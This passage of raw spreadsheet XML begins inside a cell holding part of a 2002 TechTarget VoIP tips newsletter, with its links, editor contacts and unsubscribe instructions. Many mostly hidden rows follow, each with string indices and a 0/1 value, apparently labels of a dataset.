 wireless. You find out how to best prepare for these technologies now
 so you won't get left behind, the benefits to gain/pitfalls to avoid,
 plus the real ROI for your organization.
 Get the full story right here: http://www.networkingdecisions.com
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 WEBCAST ARCHIVES | SearchNetworking
 If you missed the original airing of our Webcast on the best
 practices for availability and performance management with Jon
 Oltsik, don't fret, it's available for you to view at your leisure. 
 And, while you're at it, take a look at all our previously aired
 Webcasts, as well our upcoming live events.  We're sure you'll find
 topics that interest you. 
 View of archive on best practices for availability and performance
 management with Jon Oltsik:
 http://searchnetworking.techtarget.com/webcastsTranscriptSecurity/1,289693,sid7_gci832106,00.html 
 View our upcoming events and Webcast archive list here:
 http://searchnetworking.techtarget.com/onlineEvents/0,289675,sid7,00.html
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
 NETWORKS OF THE FUTURE | SearchNetworking Featured Topic
 Last week we attended Burton Group's Catalyst Conference and heard
 all about the hottest trends in networking: VPNs, VoIP, wireless,
 identity management, and Web services. Read more about the issues
 surrounding each topic.
 Click here for the current Featured Topic:
 http://searchnetworking.techtarget.com/featuredTopic/0,290042,sid7_gci839778,00.html
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
 EXPERT ADVICE: TED STUDWELL | Voice over IP Expert
 Dear Ted,
 Where can we get information about Inmarsat services? 
 &gt;&gt; Click for Ted Studwell's response:
 http://searchnetworking.techtarget.com/ateQuestionNResponse/0,289625,sid7_cid478713_tax292243,00.html
 &gt;&gt; Click here for other Q&amp;As with Ted that you might find useful:
 http://searchnetworking.techtarget.com/ateAnswers/0,289620,sid7_tax292243,00.html
 &gt;&gt; Click here to pose your VoIP question to Ted Studwell:
 http://searchnetworking.techtarget.com/ateQuestion/0,289624,sid7_cid466224_tax292243,00.html
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 FEATURED BOOK | SearchNetworking Bookstore
 Title: Microsoft encyclopedia of networking
 Author: Mitch Tulloch, and Ingrid Tulloch
 Description: This second edition of the award-winning Microsoft
 encyclopedia of networking has been fully updated with thousands of
 entries detailing the latest technologies, standards, products, and
 services. You get clear, concise explanations, including hundreds of
 new articles and diagrams that deftly take you from concept to
 real-world application. You also get the entire encyclopedia on
 CD-ROM, for definitive answers wherever you need them.
 &gt;&gt; Click here for ordering information:
 http://www.digitalguru.com/DigitalGuru/product_detail.asp?catalog_name=Books&amp;category_name=&amp;product_id=0735613788&amp;partner_id=65
 ____________________________________________________________________ 
 :::::::::::::::::::  SEARCHNETWORKING CONTACTS   ::::::::::::::::::: 
  SUSAN FOGARTY, Site Editor (sfogarty@techtarget.com) 
    &gt;&gt; Send us your suggestions for tips and articles. 
 ____________________________________________________________________ 
  KARA GATTINE, Assistant Site Editor (kgattine@techtarget.com)
    &gt;&gt; Send your white papers, tips and best Web link recommendations.
 ____________________________________________________________________ 
  BETH QUIMBY, News Editor (bquimby@techtarget.com) 
    &gt;&gt; Send in your product announcements and poll ideas. 
 ____________________________________________________________________ 
  GABRIELLE DERUSSY (gderussy@techtarget.com) 
    &gt;&gt; Sponsor this or any other TechTarget newsletter. 
 ____________________________________________________________________ 
 ::::::::::::::::::::  ABOUT THIS NEWSLETTER   ::::::::::::::::::::: 
 Created by TechTarget (http://www.techtarget.com) 
  TechTarget - The Most Targeted IT Media 
  Copyright 2002, All Rights Reserved.  
 Unsubscribe from 'Voice Over IP Tips'
  - Simply Reply to this Email with REMOVE within the Body or Subject
 &gt;  or
  - Go to: http://searchNetworking.techtarget.com/register
  - Log in to edit your profile.
  - Click on the link to Edit email subscriptions.
  - Uncheck the box next to the newsletter you wish 
    to unsubscribe from.
  - When finished, click "Save Changes to My Profile."
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D7121" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7122" hidden="1">
      <c r="A7122" s="1">
        <v>7120.0</v>
      </c>
      <c r="B7122" s="1" t="s">
        <v>361</v>
      </c>
      <c r="C7122" s="1" t="s">
        <v>8992</v>
      </c>
      <c r="D7122" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7123" hidden="1">
      <c r="A7123" s="1">
        <v>7121.0</v>
      </c>
      <c r="B7123" s="1" t="s">
        <v>8993</v>
      </c>
      <c r="C7123" s="1" t="s">
        <v>8994</v>
      </c>
      <c r="D7123" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7124" hidden="1">
      <c r="A7124" s="1">
        <v>7122.0</v>
      </c>
      <c r="B7124" s="1" t="s">
        <v>618</v>
      </c>
      <c r="C7124" s="1" t="s">
        <v>8995</v>
      </c>
      <c r="D7124" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7125" hidden="1">
      <c r="A7125" s="1">
        <v>7123.0</v>
      </c>
      <c r="B7125" s="1" t="s">
        <v>8996</v>
      </c>
      <c r="C7125" s="1" t="s">
        <v>8997</v>
      </c>
      <c r="D7125" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7126" hidden="1">
      <c r="A7126" s="1">
        <v>7124.0</v>
      </c>
      <c r="B7126" s="1" t="s">
        <v>801</v>
      </c>
      <c r="C7126" s="1" t="s">
        <v>8998</v>
      </c>
      <c r="D7126" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7127" hidden="1">
      <c r="A7127" s="1">
        <v>7125.0</v>
      </c>
      <c r="B7127" s="1" t="s">
        <v>4523</v>
      </c>
      <c r="C7127" s="1" t="s">
        <v>8999</v>
      </c>
      <c r="D7127" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7128" hidden="1">
      <c r="A7128" s="1">
        <v>7126.0</v>
      </c>
      <c r="B7128" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C7128" s="1" t="s">
        <v>1028</v>
      </c>
      <c r="D7128" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7129">
      <c r="A7129" s="1">
        <v>7127.0</v>
      </c>
      <c r="B7129" s="1" t="s">
        <v>6691</v>
      </c>
      <c r="C7129" s="1" t="s">
        <v>4142</v>
      </c>
      <c r="D7129" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7130" hidden="1">
      <c r="A7130" s="1">
        <v>7128.0</v>
      </c>
      <c r="B7130" s="1" t="s">
        <v>497</v>
      </c>
      <c r="C7130" s="1" t="s">
        <v>2491</v>
      </c>
      <c r="D7130" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7131" hidden="1">
      <c r="A7131" s="1">
        <v>7129.0</v>
      </c>
      <c r="B7131" s="1" t="s">
        <v>9000</v>
      </c>
      <c r="C7131" s="1" t="s">
        <v>9001</v>
      </c>
      <c r="D7131" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7132">
      <c r="A7132" s="1">
        <v>7130.0</v>
      </c>
      <c r="B7132" s="1" t="s">
        <v>9002</v>
      </c>
      <c r="C7132" s="1" t="s">
        <v>838</v>
      </c>
      <c r="D7132" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7133" hidden="1">
      <c r="A7133" s="1">
        <v>7131.0</v>
      </c>
      <c r="B7133" s="1" t="s">
        <v>9003</v>
      </c>
      <c r="C7133" s="1" t="s">
        <v>9004</v>
      </c>
      <c r="D7133" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7134" hidden="1">
      <c r="A7134" s="1">
        <v>7132.0</v>
      </c>
      <c r="B7134" s="1" t="s">
        <v>601</v>
      </c>
      <c r="C7134" s="1" t="s">
        <v>6826</v>
      </c>
      <c r="D7134" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7135" hidden="1">
      <c r="A7135" s="1">
        <v>7133.0</v>
      </c>
      <c r="B7135" s="1" t="s">
        <v>9005</v>
      </c>
      <c r="C7135" s="1" t="s">
        <v>9006</v>
      </c>
      <c r="D7135" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7136" hidden="1">
      <c r="A7136" s="1">
        <v>7134.0</v>
      </c>
      <c r="B7136" s="1" t="s">
        <v>403</v>
      </c>
      <c r="C7136" s="1" t="s">
        <v>404</v>
      </c>
      <c r="D7136" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7137" hidden="1">
      <c r="A7137" s="1">
        <v>7135.0</v>
      </c>
      <c r="B7137" s="1" t="s">
        <v>8062</v>
      </c>
      <c r="C7137" s="1" t="s">
        <v>8063</v>
      </c>
      <c r="D7137" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7138" hidden="1">
      <c r="A7138" s="1">
        <v>7136.0</v>
      </c>
      <c r="B7138" s="1" t="s">
        <v>1451</v>
      </c>
      <c r="C7138" s="1" t="s">
        <v>9007</v>
      </c>
      <c r="D7138" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7139" hidden="1">
      <c r="A7139" s="1">
        <v>7137.0</v>
      </c>
      <c r="B7139" s="1" t="s">
        <v>4261</v>
      </c>
      <c r="C7139" s="1" t="s">
        <v>4262</v>
      </c>
      <c r="D7139" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7140" hidden="1">
      <c r="A7140" s="1">
        <v>7138.0</v>
      </c>
      <c r="B7140" s="1" t="s">
        <v>1181</v>
      </c>
      <c r="C7140" s="1" t="s">
        <v>9008</v>
      </c>
      <c r="D7140" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7141" hidden="1">
      <c r="A7141" s="1">
        <v>7139.0</v>
      </c>
      <c r="B7141" s="1" t="s">
        <v>8993</v>
      </c>
      <c r="C7141" s="1" t="s">
        <v>8994</v>
      </c>
      <c r="D7141" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7142" hidden="1">
      <c r="A7142" s="1">
        <v>7140.0</v>
      </c>
      <c r="B7142" s="1" t="s">
        <v>5874</v>
      </c>
      <c r="C7142" s="1" t="s">
        <v>5875</v>
      </c>
      <c r="D7142" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7143" hidden="1">
      <c r="A7143" s="1">
        <v>7141.0</v>
      </c>
      <c r="B7143" s="1" t="s">
        <v>4426</v>
      </c>
      <c r="C7143" s="1" t="s">
        <v>9009</v>
      </c>
      <c r="D7143" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7144">
      <c r="A7144" s="1">
        <v>7142.0</v>
      </c>
      <c r="B7144" s="1" t="s">
        <v>1238</v>
      </c>
      <c r="C7144" s="1" t="s">
        <v>1239</v>
      </c>
      <c r="D7144" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7145">
      <c r="A7145" s="1">
        <v>7143.0</v>
      </c>
      <c r="B7145" s="1" t="s">
        <v>9010</v>
      </c>
      <c r="C7145" s="1" t="s">
        <v>9011</v>
      </c>
      <c r="D7145" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7146" hidden="1">
      <c r="A7146" s="1">
        <v>7144.0</v>
      </c>
      <c r="B7146" s="1" t="s">
        <v>9012</v>
      </c>
      <c r="C7146" s="1" t="s">
        <v>9013</v>
      </c>
      <c r="D7146" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7147" hidden="1">
      <c r="A7147" s="1">
        <v>7145.0</v>
      </c>
      <c r="B7147" s="1" t="s">
        <v>5453</v>
      </c>
      <c r="C7147" s="1" t="s">
        <v>5454</v>
      </c>
      <c r="D7147" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7148" hidden="1">
      <c r="A7148" s="1">
        <v>7146.0</v>
      </c>
      <c r="B7148" s="1" t="s">
        <v>187</v>
      </c>
      <c r="C7148" s="1" t="s">
        <v>9014</v>
      </c>
      <c r="D7148" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7149" hidden="1">
      <c r="A7149" s="1">
        <v>7147.0</v>
      </c>
      <c r="B7149" s="1" t="s">
        <v>784</v>
      </c>
      <c r="C7149" s="1" t="s">
        <v>9015</v>
      </c>
      <c r="D7149" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7150">
      <c r="A7150" s="1">
        <v>7148.0</v>
      </c>
      <c r="B7150" s="1" t="s">
        <v>3816</v>
      </c>
      <c r="C7150" s="1" t="s">
        <v>3817</v>
      </c>
      <c r="D7150" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7151" hidden="1">
      <c r="A7151" s="1">
        <v>7149.0</v>
      </c>
      <c r="B7151" s="1" t="s">
        <v>8746</v>
      </c>
      <c r="C7151" s="1" t="s">
        <v>8747</v>
      </c>
      <c r="D7151" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7152" hidden="1">
      <c r="A7152" s="1">
        <v>7150.0</v>
      </c>
      <c r="B7152" s="1" t="s">
        <v>953</v>
      </c>
      <c r="C7152" s="1" t="s">
        <v>5339</v>
      </c>
      <c r="D7152" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7153">
      <c r="A7153" s="1">
        <v>7151.0</v>
      </c>
      <c r="B7153" s="1" t="s">
        <v>7734</v>
      </c>
      <c r="C7153" s="1" t="s">
        <v>9016</v>
      </c>
      <c r="D7153" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7154">
      <c r="A7154" s="1">
        <v>7152.0</v>
      </c>
      <c r="B7154" s="1" t="s">
        <v>9017</v>
      </c>
      <c r="C7154" s="1" t="s">
        <v>9018</v>
      </c>
      <c r="D7154" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7155" hidden="1">
      <c r="A7155" s="1">
        <v>7153.0</v>
      </c>
      <c r="B7155" s="1" t="s">
        <v>9019</v>
      </c>
      <c r="C7155" s="1" t="s">
        <v>9020</v>
      </c>
      <c r="D7155" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7156" hidden="1">
      <c r="A7156" s="1">
        <v>7154.0</v>
      </c>
      <c r="B7156" s="1" t="s">
        <v>8768</v>
      </c>
      <c r="C7156" s="1" t="s">
        <v>8769</v>
      </c>
      <c r="D7156" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7157">
      <c r="A7157" s="1">
        <v>7155.0</v>
      </c>
      <c r="B7157" s="1" t="s">
        <v>8737</v>
      </c>
      <c r="C7157" s="1" t="s">
        <v>8738</v>
      </c>
      <c r="D7157" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7158" hidden="1">
      <c r="A7158" s="1">
        <v>7156.0</v>
      </c>
      <c r="B7158" s="1" t="s">
        <v>8950</v>
      </c>
      <c r="C7158" s="1" t="s">
        <v>8951</v>
      </c>
      <c r="D7158" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7159" hidden="1">
      <c r="A7159" s="1">
        <v>7157.0</v>
      </c>
      <c r="B7159" s="1" t="s">
        <v>9021</v>
      </c>
      <c r="C7159" s="1" t="s">
        <v>9022</v>
      </c>
      <c r="D7159" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7160" hidden="1">
      <c r="A7160" s="1">
        <v>7158.0</v>
      </c>
      <c r="B7160" s="1" t="s">
        <v>30</v>
      </c>
      <c r="C7160" s="1" t="s">
        <v>9023</v>
      </c>
      <c r="D7160" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7161" hidden="1">
      <c r="A7161" s="1">
        <v>7159.0</v>
      </c>
      <c r="B7161" s="1" t="s">
        <v>5658</v>
      </c>
      <c r="C7161" s="1" t="s">
        <v>9024</v>
      </c>
      <c r="D7161" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7162">
      <c r="A7162" s="1">
        <v>7160.0</v>
      </c>
      <c r="B7162" s="1" t="s">
        <v>9025</v>
      </c>
      <c r="C7162" s="1" t="s">
        <v>9</v>
      </c>
      <c r="D7162" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7163" hidden="1">
      <c r="A7163" s="1">
        <v>7161.0</v>
      </c>
      <c r="B7163" s="1" t="s">
        <v>8112</v>
      </c>
      <c r="C7163" s="1" t="s">
        <v>8113</v>
      </c>
      <c r="D7163" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7164" hidden="1">
      <c r="A7164" s="1">
        <v>7162.0</v>
      </c>
      <c r="B7164" s="1" t="s">
        <v>953</v>
      </c>
      <c r="C7164" s="1" t="s">
        <v>9026</v>
      </c>
      <c r="D7164" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7165" hidden="1">
      <c r="A7165" s="1">
        <v>7163.0</v>
      </c>
      <c r="B7165" s="1" t="s">
        <v>1399</v>
      </c>
      <c r="C7165" s="1" t="s">
        <v>1400</v>
      </c>
      <c r="D7165" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7166" hidden="1">
      <c r="A7166" s="1">
        <v>7164.0</v>
      </c>
      <c r="B7166" s="1" t="s">
        <v>9027</v>
      </c>
      <c r="C7166" s="1" t="s">
        <v>9028</v>
      </c>
      <c r="D7166" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7167" hidden="1">
      <c r="A7167" s="1">
        <v>7165.0</v>
      </c>
      <c r="B7167" s="1" t="s">
        <v>4920</v>
      </c>
      <c r="C7167" s="1" t="s">
        <v>4921</v>
      </c>
      <c r="D7167" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7168" hidden="1">
      <c r="A7168" s="1">
        <v>7166.0</v>
      </c>
      <c r="B7168" s="1" t="s">
        <v>7569</v>
      </c>
      <c r="C7168" s="1" t="s">
        <v>7570</v>
      </c>
      <c r="D7168" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7169" hidden="1">
      <c r="A7169" s="1">
        <v>7167.0</v>
      </c>
      <c r="B7169" s="1" t="s">
        <v>4682</v>
      </c>
      <c r="C7169" s="1" t="s">
        <v>5099</v>
      </c>
      <c r="D7169" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7170" hidden="1">
      <c r="A7170" s="1">
        <v>7168.0</v>
      </c>
      <c r="B7170" s="1" t="s">
        <v>9029</v>
      </c>
      <c r="C7170" s="1" t="s">
        <v>9030</v>
      </c>
      <c r="D7170" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7171">
      <c r="A7171" s="1">
        <v>7169.0</v>
      </c>
      <c r="B7171" s="1" t="s">
        <v>9031</v>
      </c>
      <c r="C7171" s="1" t="s">
        <v>9032</v>
      </c>
      <c r="D7171" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7172">
      <c r="A7172" s="1">
        <v>7170.0</v>
      </c>
      <c r="B7172" s="1" t="s">
        <v>8937</v>
      </c>
      <c r="C7172" s="1" t="s">
        <v>8938</v>
      </c>
      <c r="D7172" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7173" hidden="1">
      <c r="A7173" s="1">
        <v>7171.0</v>
      </c>
      <c r="B7173" s="1" t="s">
        <v>533</v>
      </c>
      <c r="C7173" s="1" t="s">
        <v>7032</v>
      </c>
      <c r="D7173" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7174" hidden="1">
      <c r="A7174" s="1">
        <v>7172.0</v>
      </c>
      <c r="B7174" s="1" t="s">
        <v>1523</v>
      </c>
      <c r="C7174" s="1" t="s">
        <v>5090</v>
      </c>
      <c r="D7174" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7175" hidden="1">
      <c r="A7175" s="1">
        <v>7173.0</v>
      </c>
      <c r="B7175" s="1" t="s">
        <v>5018</v>
      </c>
      <c r="C7175" s="1" t="s">
        <v>5019</v>
      </c>
      <c r="D7175" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7176" hidden="1">
      <c r="A7176" s="1">
        <v>7174.0</v>
      </c>
      <c r="B7176" s="1" t="s">
        <v>4952</v>
      </c>
      <c r="C7176" s="1" t="s">
        <v>4953</v>
      </c>
      <c r="D7176" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7177" hidden="1">
      <c r="A7177" s="1">
        <v>7175.0</v>
      </c>
      <c r="B7177" s="1" t="s">
        <v>9033</v>
      </c>
      <c r="C7177" s="1" t="s">
        <v>9034</v>
      </c>
      <c r="D7177" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7178">
      <c r="A7178" s="1">
        <v>7176.0</v>
      </c>
      <c r="B7178" s="1" t="s">
        <v>8047</v>
      </c>
      <c r="C7178" s="1" t="s">
        <v>8048</v>
      </c>
      <c r="D7178" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7179">
      <c r="A7179" s="1">
        <v>7177.0</v>
      </c>
      <c r="B7179" s="1" t="s">
        <v>9035</v>
      </c>
      <c r="C7179" s="1" t="s">
        <v>9036</v>
      </c>
      <c r="D7179" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7180" hidden="1">
      <c r="A7180" s="1">
        <v>7178.0</v>
      </c>
      <c r="B7180" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C7180" s="1" t="s">
        <v>9037</v>
      </c>
      <c r="D7180" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7181" hidden="1">
      <c r="A7181" s="1">
        <v>7179.0</v>
      </c>
      <c r="B7181" s="1" t="s">
        <v>9038</v>
      </c>
      <c r="C7181" s="1" t="s">
        <v>9039</v>
      </c>
      <c r="D7181" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7182" hidden="1">
      <c r="A7182" s="1">
        <v>7180.0</v>
      </c>
      <c r="B7182" s="1" t="s">
        <v>323</v>
      </c>
      <c r="C7182" s="1" t="s">
        <v>1144</v>
      </c>
      <c r="D7182" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7183" hidden="1">
      <c r="A7183" s="1">
        <v>7181.0</v>
      </c>
      <c r="B7183" s="1" t="s">
        <v>663</v>
      </c>
      <c r="C7183" s="1" t="s">
        <v>3237</v>
      </c>
      <c r="D7183" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7184">
      <c r="A7184" s="1">
        <v>7182.0</v>
      </c>
      <c r="B7184" s="1" t="s">
        <v>9040</v>
      </c>
      <c r="C7184" s="1" t="s">
        <v>9041</v>
      </c>
      <c r="D7184" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7185" hidden="1">
      <c r="A7185" s="1">
        <v>7183.0</v>
      </c>
      <c r="B7185" s="1" t="s">
        <v>9042</v>
      </c>
      <c r="C7185" s="1" t="s">
        <v>9043</v>
      </c>
      <c r="D7185" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7186" hidden="1">
      <c r="A7186" s="1">
        <v>7184.0</v>
      </c>
      <c r="B7186" s="1" t="s">
        <v>9044</v>
      </c>
      <c r="C7186" s="1" t="s">
        <v>9045</v>
      </c>
      <c r="D7186" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7187" hidden="1">
      <c r="A7187" s="1">
        <v>7185.0</v>
      </c>
      <c r="B7187" s="1" t="s">
        <v>361</v>
      </c>
      <c r="C7187" s="1" t="s">
        <v>8992</v>
      </c>
      <c r="D7187" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7188" hidden="1">
      <c r="A7188" s="1">
        <v>7186.0</v>
      </c>
      <c r="B7188" s="1" t="s">
        <v>702</v>
      </c>
      <c r="C7188" s="1" t="s">
        <v>703</v>
      </c>
      <c r="D7188" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7189" hidden="1">
      <c r="A7189" s="1">
        <v>7187.0</v>
      </c>
      <c r="B7189" s="1" t="s">
        <v>7522</v>
      </c>
      <c r="C7189" s="1" t="s">
        <v>9046</v>
      </c>
      <c r="D7189" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7190" hidden="1">
      <c r="A7190" s="1">
        <v>7188.0</v>
      </c>
      <c r="B7190" s="1" t="s">
        <v>601</v>
      </c>
      <c r="C7190" s="1" t="s">
        <v>1146</v>
      </c>
      <c r="D7190" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7191">
      <c r="A7191" s="1">
        <v>7189.0</v>
      </c>
      <c r="B7191" s="1" t="s">
        <v>9047</v>
      </c>
      <c r="C7191" s="1" t="s">
        <v>9048</v>
      </c>
      <c r="D7191" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7192" hidden="1">
      <c r="A7192" s="1">
        <v>7190.0</v>
      </c>
      <c r="B7192" s="1" t="s">
        <v>889</v>
      </c>
      <c r="C7192" s="1" t="s">
        <v>5856</v>
      </c>
      <c r="D7192" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7193">
      <c r="A7193" s="1">
        <v>7191.0</v>
      </c>
      <c r="B7193" s="1" t="s">
        <v>9049</v>
      </c>
      <c r="C7193" s="1" t="s">
        <v>9050</v>
      </c>
      <c r="D7193" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7194" hidden="1">
      <c r="A7194" s="1">
        <v>7192.0</v>
      </c>
      <c r="B7194" s="1" t="s">
        <v>582</v>
      </c>
      <c r="C7194" s="1" t="s">
        <v>2412</v>
      </c>
      <c r="D7194" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7195" hidden="1">
      <c r="A7195" s="1">
        <v>7193.0</v>
      </c>
      <c r="B7195" s="1" t="s">
        <v>9051</v>
      </c>
      <c r="C7195" s="1" t="s">
        <v>9052</v>
      </c>
      <c r="D7195" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7196" hidden="1">
      <c r="A7196" s="1">
        <v>7194.0</v>
      </c>
      <c r="B7196" s="1" t="s">
        <v>9053</v>
      </c>
      <c r="C7196" s="1" t="s">
        <v>9054</v>
      </c>
      <c r="D7196" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7197">
      <c r="A7197" s="1">
        <v>7195.0</v>
      </c>
      <c r="B7197" s="1" t="s">
        <v>9055</v>
      </c>
      <c r="C7197" s="1" t="s">
        <v>9056</v>
      </c>
      <c r="D7197" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7198" hidden="1">
      <c r="A7198" s="1">
        <v>7196.0</v>
      </c>
      <c r="B7198" s="1" t="s">
        <v>9057</v>
      </c>
      <c r="C7198" s="1" t="s">
        <v>9058</v>
      </c>
      <c r="D7198" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7199">
      <c r="A7199" s="1">
        <v>7197.0</v>
      </c>
      <c r="B7199" s="1" t="s">
        <v>9059</v>
      </c>
      <c r="C7199" s="1" t="s">
        <v>9060</v>
      </c>
      <c r="D7199" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7200" hidden="1">
      <c r="A7200" s="1">
        <v>7198.0</v>
      </c>
      <c r="B7200" s="1" t="s">
        <v>4290</v>
      </c>
      <c r="C7200" s="1" t="s">
        <v>4291</v>
      </c>
      <c r="D7200" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7201">
      <c r="A7201" s="1">
        <v>7199.0</v>
      </c>
      <c r="B7201" s="1" t="s">
        <v>9061</v>
      </c>
      <c r="C7201" s="1" t="s">
        <v>9062</v>
      </c>
      <c r="D7201" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="7202" hidden="1">
      <c r="A7202" s="1">
        <v>7200.0</v>
      </c>
      <c r="B7202" s="1" t="s">
        <v>2041</v>
      </c>
      <c r="C7202" s="1" t="s">
        <v>2042</v>
      </c>
      <c r="D7202" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7203" hidden="1">
      <c r="A7203" s="1">
        <v>7201.0</v>
      </c>
      <c r="B7203" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C7203" s="1" t="s">
        <v>4157</v>
      </c>
      <c r="D7203" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7204" hidden="1">
      <c r="A7204" s="1">
        <v>7202.0</v>
      </c>
      <c r="B7204" s="1" t="s">
        <v>9063</v>
      </c>
      <c r="C7204" s="1" t="s">
        <v>9064</v>
      </c>
      <c r="D7204" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7205" hidden="1">
      <c r="A7205" s="1">
        <v>7203.0</v>
      </c>
      <c r="B7205" s="1" t="s">
        <v>204</v>
      </c>
      <c r="C7205" s="1" t="s">
        <v>2912</v>
      </c>
      <c r="D7205" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7206" hidden="1">
      <c r="A7206" s="1">
        <v>7204.0</v>
      </c>
      <c r="B7206" s="1" t="s">
        <v>5526</v>
      </c>
      <c r="C7206" s="1" t="s">
        <v>5527</v>
      </c>
      <c r="D7206" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7207" hidden="1">
      <c r="A7207" s="1">
        <v>7205.0</v>
      </c>
      <c r="B7207" s="1" t="s">
        <v>239</v>
      </c>
      <c r="C7207" s="1" t="s">
        <v>240</v>
      </c>
      <c r="D7207" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7208" hidden="1">
      <c r="A7208" s="1">
        <v>7206.0</v>
      </c>
      <c r="B7208" s="1" t="s">
        <v>3713</v>
      </c>
      <c r="C7208" s="1" t="s">
        <v>9065</v>
      </c>
      <c r="D7208" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7209" hidden="1">
      <c r="A7209" s="1">
        <v>7207.0</v>
      </c>
      <c r="B7209" s="1" t="s">
        <v>9066</v>
      </c>
      <c r="C7209" s="1" t="s">
        <v>9067</v>
      </c>
      <c r="D7209" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="7210" hidden="1">
      <c r="A7210" s="1">
        <v>7208.0</v>
      </c>
      <c r="B7210" s="1" t="s">
        <v>6097</v>
      </c>
      <c r="C7210" s="1" t="s">
        <v>6098</v>
      </c>
      <c r="D7210" s="1">
